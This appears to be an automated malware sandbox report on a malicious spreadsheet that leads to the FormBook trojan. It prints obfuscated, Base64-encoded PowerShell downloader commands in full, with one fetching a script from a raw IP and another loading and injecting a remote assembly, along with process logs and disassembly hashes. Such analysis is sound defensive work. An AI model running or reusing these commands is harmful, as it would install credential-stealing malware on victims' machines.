                                                  Commandline:pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
                                                  Imagebase:0x13f4c0000
                                                  File size:443'392 bytes
                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:20
                                                  Start time:01:25:05
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
                                                  Imagebase:0x13f0d0000
                                                  File size:2'758'280 bytes
                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:21
                                                  Start time:01:25:06
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"
                                                  Imagebase:0x13fc40000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:24
                                                  Start time:01:25:11
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
                                                  Imagebase:0xff210000
                                                  File size:168'960 bytes
                                                  MD5 hash:045451FA238A75305CC26AC982472367
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:25
                                                  Start time:01:25:11
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
                                                  Imagebase:0x13f4c0000
                                                  File size:443'392 bytes
                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:27
                                                  Start time:01:25:20
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                  Imagebase:0xa40000
                                                  File size:55'384 bytes
                                                  MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  Has exited:true

                                                  General

                                                  Target ID:30
                                                  Start time:01:25:35
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                  Imagebase:0xa40000
                                                  File size:55'384 bytes
                                                  MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Disassembly

                                                  Code Analysis

                                                  Call Graph

                                                  • Entrypoint
                                                  • Decryption Function
                                                  • Executed
                                                  • Not Executed
                                                  • Show Help
                                                  callgraph 1 Error: Graph is empty

                                                  Module: Sheet1

                                                  Declaration
                                                  LineContent
                                                  1

                                                  Attribute VB_Name = "Sheet1"

                                                  2

                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                  3

                                                  Attribute VB_GlobalNameSpace = False

                                                  4

                                                  Attribute VB_Creatable = False

                                                  5

                                                  Attribute VB_PredeclaredId = True

                                                  6

                                                  Attribute VB_Exposed = True

                                                  7

                                                  Attribute VB_TemplateDerived = False

                                                  8

                                                  Attribute VB_Customizable = True

                                                  Module: Sheet2

                                                  Declaration
                                                  LineContent
                                                  1

                                                  Attribute VB_Name = "Sheet2"

                                                  2

                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                  3

                                                  Attribute VB_GlobalNameSpace = False

                                                  4

                                                  Attribute VB_Creatable = False

                                                  5

                                                  Attribute VB_PredeclaredId = True

                                                  6

                                                  Attribute VB_Exposed = True

                                                  7

                                                  Attribute VB_TemplateDerived = False

                                                  8

                                                  Attribute VB_Customizable = True

                                                  Module: ThisWorkbook

                                                  Declaration
                                                  LineContent
                                                  1

                                                  Attribute VB_Name = "ThisWorkbook"

                                                  2

                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                  3

                                                  Attribute VB_GlobalNameSpace = False

                                                  4

                                                  Attribute VB_Creatable = False

                                                  5

                                                  Attribute VB_PredeclaredId = True

                                                  6

                                                  Attribute VB_Exposed = True

                                                  7

                                                  Attribute VB_TemplateDerived = False

                                                  8

                                                  Attribute VB_Customizable = True

                                                  Reset < >

                                                    Executed Functions

                                                    Function 02E00FC1 Relevance: .0, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.422769979.0000000002E00000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_2e00000_mshta.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction ID: f6f0c69f69ec071507fd3d12a691d6d413f807da0261bc850b31cf896fa180b7
                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction Fuzzy Hash:
                                                    Function 02E00FB1 Relevance: .0, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.422769979.0000000002E00000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_2e00000_mshta.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction ID: f6f0c69f69ec071507fd3d12a691d6d413f807da0261bc850b31cf896fa180b7
                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction Fuzzy Hash:
                                                    Function 02E00FB9 Relevance: .0, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.422769979.0000000002E00000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_2e00000_mshta.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction ID: f6f0c69f69ec071507fd3d12a691d6d413f807da0261bc850b31cf896fa180b7
                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction Fuzzy Hash:

                                                    Execution Graph

                                                    Execution Coverage:3.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:4
                                                    Total number of Limit Nodes:0
                                                    execution_graph 4118 7fe899d7c25 4119 7fe899d7c33 4118->4119 4120 7fe899d7be3 URLDownloadToFileW 4119->4120 4121 7fe899d7c00 4119->4121 4120->4121

                                                    Executed Functions

                                                    Function 000007FE899D7018 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451397679.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe899d0000_powershell.jbxd
                                                    Similarity
                                                    • API ID: DownloadFile
                                                    • String ID:
                                                    • API String ID: 1407266417-0
                                                    • Opcode ID: a0035c940332f12a217b0e092e9456d6030e47891a6536e7ec8ade8ec5b5b7e3
                                                    • Instruction ID: 11c33c7b11a99dd25f2647b1e9da73b6ea15c438626c603691e95b34cad6ad45
                                                    • Opcode Fuzzy Hash: a0035c940332f12a217b0e092e9456d6030e47891a6536e7ec8ade8ec5b5b7e3
                                                    • Instruction Fuzzy Hash: C931B171918A5C8FDB19EF5CD8857A9B7E0FB59311F00822ED04DD3261CB70B8058B81
                                                    Function 000007FE899D7AE1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451397679.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe899d0000_powershell.jbxd
                                                    Similarity
                                                    • API ID: DownloadFile
                                                    • String ID:
                                                    • API String ID: 1407266417-0
                                                    • Opcode ID: e9bf2a7a0ff1d59173676c30a39d75dcb183eb9f2beb233881a0df3a09769d3e
                                                    • Instruction ID: 2d87ec3c0a72d8d44d0dd28553830fe3f1053cee691a371359325566c5076767
                                                    • Opcode Fuzzy Hash: e9bf2a7a0ff1d59173676c30a39d75dcb183eb9f2beb233881a0df3a09769d3e
                                                    • Instruction Fuzzy Hash: 9441F67091CB889FD716DB589C847BABBF0FB56321F04426FD089D3562CB646806C781
                                                    Function 000007FE899D7C25 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451397679.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe899d0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d938ac031c0ac3bb16f808beca7a89af3d7f54faf57485278deed4b8ace4750
                                                    • Instruction ID: 8a1852348879f0a802aba4d33ad226a6e6383b07196a7692035ffdf5dea7cc1c
                                                    • Opcode Fuzzy Hash: 3d938ac031c0ac3bb16f808beca7a89af3d7f54faf57485278deed4b8ace4750
                                                    • Instruction Fuzzy Hash: 4521A16191E3D15FE317A778AC612E87FA0AF03224F0901D7D0D8CB0F3D619655AC766
                                                    Function 000007FE89AA8519 Relevance: .7, Instructions: 712COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 41 7fe89aa8519-7fe89aa853a 42 7fe89aa8556-7fe89aa855a 41->42 43 7fe89aa853c-7fe89aa8554 41->43 44 7fe89aa8576-7fe89aa85c9 42->44 45 7fe89aa855c-7fe89aa8575 42->45 43->42 47 7fe89aa8aad-7fe89aa8b66 44->47 48 7fe89aa85cf-7fe89aa85d9 44->48 45->44 49 7fe89aa85db-7fe89aa85e8 48->49 50 7fe89aa85f2-7fe89aa85f9 48->50 49->50 54 7fe89aa85ea-7fe89aa85f0 49->54 51 7fe89aa85fb-7fe89aa860e 50->51 52 7fe89aa8610 50->52 55 7fe89aa8612-7fe89aa8614 51->55 52->55 54->50 56 7fe89aa8a28-7fe89aa8a32 55->56 57 7fe89aa861a-7fe89aa8626 55->57 61 7fe89aa8a45-7fe89aa8a55 56->61 62 7fe89aa8a34-7fe89aa8a44 56->62 57->47 60 7fe89aa862c-7fe89aa8636 57->60 65 7fe89aa8638-7fe89aa8645 60->65 66 7fe89aa8652-7fe89aa8662 60->66 63 7fe89aa8a57-7fe89aa8a5b 61->63 64 7fe89aa8a62-7fe89aa8aac 61->64 63->64 65->66 68 7fe89aa8647-7fe89aa8650 65->68 66->56 73 7fe89aa8668-7fe89aa869c 66->73 68->66 73->56 78 7fe89aa86a2-7fe89aa86ae 73->78 78->47 79 7fe89aa86b4-7fe89aa86be 78->79 80 7fe89aa86d7-7fe89aa86dc 79->80 81 7fe89aa86c0-7fe89aa86cd 79->81 80->56 83 7fe89aa86e2-7fe89aa86e7 80->83 81->80 82 7fe89aa86cf-7fe89aa86d5 81->82 82->80 83->56 84 7fe89aa86ed-7fe89aa86f2 83->84 84->56 86 7fe89aa86f8-7fe89aa8707 84->86 87 7fe89aa8709-7fe89aa8713 86->87 88 7fe89aa8717 86->88 89 7fe89aa8715 87->89 90 7fe89aa8733-7fe89aa87be 87->90 91 7fe89aa871c-7fe89aa8729 88->91 89->91 98 7fe89aa87c0-7fe89aa87cb 90->98 99 7fe89aa87d2-7fe89aa87f4 90->99 91->90 92 7fe89aa872b-7fe89aa8731 91->92 92->90 98->99 100 7fe89aa87f6-7fe89aa8800 99->100 101 7fe89aa8804 99->101 102 7fe89aa8820-7fe89aa88ae 100->102 103 7fe89aa8802 100->103 104 7fe89aa8809-7fe89aa8816 101->104 111 7fe89aa88b0-7fe89aa88bb 102->111 112 7fe89aa88c2-7fe89aa88e0 102->112 103->104 104->102 105 7fe89aa8818-7fe89aa881e 104->105 105->102 111->112 113 7fe89aa88f0 112->113 114 7fe89aa88e2-7fe89aa88ec 112->114 117 7fe89aa88f5-7fe89aa8903 113->117 115 7fe89aa890d-7fe89aa899d 114->115 116 7fe89aa88ee 114->116 124 7fe89aa89b1-7fe89aa8a0a 115->124 125 7fe89aa899f-7fe89aa89aa 115->125 116->117 117->115 118 7fe89aa8905-7fe89aa890b 117->118 118->115 128 7fe89aa8a12-7fe89aa8a27 124->128 125->124
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ad21bd4a7343743214b381b547eaa27271d0756cd2cc3fbac4c709aaac8a542
                                                    • Instruction ID: e0ae800f8587c010b1374f1a4c21174bf8cb690650d307d426589c2af2782764
                                                    • Opcode Fuzzy Hash: 1ad21bd4a7343743214b381b547eaa27271d0756cd2cc3fbac4c709aaac8a542
                                                    • Instruction Fuzzy Hash: 1522F43090CB894FE79ADB2C94506697FE2FF9A354F2401EAD48EC72A3DA34AC55C741
                                                    Function 000007FE89AA4135 Relevance: .4, Instructions: 437COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 129 7fe89aa4135-7fe89aa41c4 130 7fe89aa4427-7fe89aa44e6 129->130 131 7fe89aa41ca-7fe89aa41d4 129->131 132 7fe89aa41d6-7fe89aa41e3 131->132 133 7fe89aa41ed-7fe89aa41f2 131->133 132->133 134 7fe89aa41e5-7fe89aa41eb 132->134 136 7fe89aa41f8-7fe89aa41fb 133->136 137 7fe89aa43cb-7fe89aa43d5 133->137 134->133 138 7fe89aa41fd-7fe89aa4210 136->138 139 7fe89aa4212 136->139 140 7fe89aa43d7-7fe89aa43e3 137->140 141 7fe89aa43e4-7fe89aa43f4 137->141 144 7fe89aa4214-7fe89aa4216 138->144 139->144 145 7fe89aa43f6-7fe89aa43fa 141->145 146 7fe89aa4401-7fe89aa4424 141->146 144->137 147 7fe89aa421c-7fe89aa4250 144->147 145->146 146->130 154 7fe89aa4267 147->154 155 7fe89aa4252-7fe89aa4265 147->155 156 7fe89aa4269-7fe89aa426b 154->156 155->156 156->137 157 7fe89aa4271-7fe89aa4279 156->157 157->130 159 7fe89aa427f-7fe89aa4289 157->159 160 7fe89aa428b-7fe89aa4298 159->160 161 7fe89aa42a5-7fe89aa42b5 159->161 160->161 162 7fe89aa429a-7fe89aa42a3 160->162 161->137 165 7fe89aa42bb-7fe89aa42ec 161->165 162->161 165->137 168 7fe89aa42f2-7fe89aa431e 165->168 170 7fe89aa4320-7fe89aa4342 168->170 171 7fe89aa4344 168->171 172 7fe89aa4346-7fe89aa4348 170->172 171->172 172->137 174 7fe89aa434e-7fe89aa4356 172->174 175 7fe89aa4358-7fe89aa4362 174->175 176 7fe89aa4366 174->176 178 7fe89aa4364 175->178 179 7fe89aa4382-7fe89aa43b1 175->179 180 7fe89aa436b-7fe89aa4378 176->180 178->180 184 7fe89aa43b8-7fe89aa43ca 179->184 180->179 182 7fe89aa437a-7fe89aa4380 180->182 182->179
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce42d0076088c2146806d2bb55c3487cd9c3ed2b40682005059e883d93e05633
                                                    • Instruction ID: fb3b6d41a96943c90a869811ff568f7ad4e09e9b5d0797e0523e443f7f0f6d11
                                                    • Opcode Fuzzy Hash: ce42d0076088c2146806d2bb55c3487cd9c3ed2b40682005059e883d93e05633
                                                    • Instruction Fuzzy Hash: 58C1263090DB890FE75AA76C58506BA7FE1EF46784F1901EBE48ECB1A3D618AC15C361
                                                    Function 000007FE89AA563D Relevance: .4, Instructions: 411COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 185 7fe89aa563d-7fe89aa5647 186 7fe89aa5649 185->186 187 7fe89aa564e-7fe89aa565f 185->187 186->187 188 7fe89aa564b 186->188 189 7fe89aa5666-7fe89aa5677 187->189 190 7fe89aa5661 187->190 188->187 192 7fe89aa5679 189->192 193 7fe89aa567e-7fe89aa568f 189->193 190->189 191 7fe89aa5663 190->191 191->189 192->193 194 7fe89aa567b 192->194 195 7fe89aa5696-7fe89aa56a7 193->195 196 7fe89aa5691 193->196 194->193 198 7fe89aa56a9 195->198 199 7fe89aa56ae-7fe89aa56ca 195->199 196->195 197 7fe89aa5693 196->197 197->195 198->199 202 7fe89aa56ab 198->202 200 7fe89aa56e6-7fe89aa5708 199->200 201 7fe89aa56cc-7fe89aa56e4 199->201 203 7fe89aa570a-7fe89aa570c 200->203 204 7fe89aa5760-7fe89aa576a 200->204 201->200 202->199 205 7fe89aa5770-7fe89aa577a 204->205 206 7fe89aa58d3-7fe89aa599c 204->206 207 7fe89aa577c-7fe89aa5789 205->207 208 7fe89aa5793-7fe89aa5798 205->208 207->208 209 7fe89aa578b-7fe89aa5791 207->209 210 7fe89aa579e-7fe89aa57a1 208->210 211 7fe89aa5873-7fe89aa587d 208->211 209->208 215 7fe89aa57e6 210->215 216 7fe89aa57a3-7fe89aa57b2 210->216 213 7fe89aa587f-7fe89aa588d 211->213 214 7fe89aa588e-7fe89aa589e 211->214 218 7fe89aa58ab-7fe89aa58d0 214->218 219 7fe89aa58a0-7fe89aa58a4 214->219 220 7fe89aa57e8-7fe89aa57ea 215->220 216->206 228 7fe89aa57b8-7fe89aa57c2 216->228 218->206 219->218 220->211 222 7fe89aa57f0-7fe89aa57f6 220->222 225 7fe89aa57f8-7fe89aa5805 222->225 226 7fe89aa5812-7fe89aa5843 222->226 225->226 231 7fe89aa5807-7fe89aa5810 225->231 236 7fe89aa584a-7fe89aa5854 226->236 229 7fe89aa57db-7fe89aa57e4 228->229 230 7fe89aa57c4-7fe89aa57d1 228->230 229->220 230->229 232 7fe89aa57d3-7fe89aa57d9 230->232 231->226 232->229 239 7fe89aa585a-7fe89aa5872 236->239
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ef1cefe6f52f49f5b6fde2383b0fad921f5166722e41ed846e02905f3e98d71
                                                    • Instruction ID: 5ca496f9d8ef5fbef73b6864982b36a010e76d539c2f464de8ef186a0d234f36
                                                    • Opcode Fuzzy Hash: 4ef1cefe6f52f49f5b6fde2383b0fad921f5166722e41ed846e02905f3e98d71
                                                    • Instruction Fuzzy Hash: F1C1F33080E7C95FD3579728A8146B97FE1EF47260F1911EBD48DCB0A3D619AD1AC3A2
                                                    Function 000007FE89AA0EED Relevance: .4, Instructions: 365COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.451456788.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_7fe89aa0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f1c65736c00fb6abbb13ba03d38f80b698443e5c754eca1803143cb2db4267e4
                                                    • Instruction ID: cee0f8858e45b0afe1eaa497c99e790bf72584d41d4a091764910384bee18d38
                                                    • Opcode Fuzzy Hash: f1c65736c00fb6abbb13ba03d38f80b698443e5c754eca1803143cb2db4267e4
                                                    • Instruction Fuzzy Hash: B9B10021A0E7C90FE347973C58642657FE1EF47244B2A01EBC48ECB1B3DA189C5AC362
                                                    Function 000007FE89AA5711 Relevance: .2, Instructions: 166COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
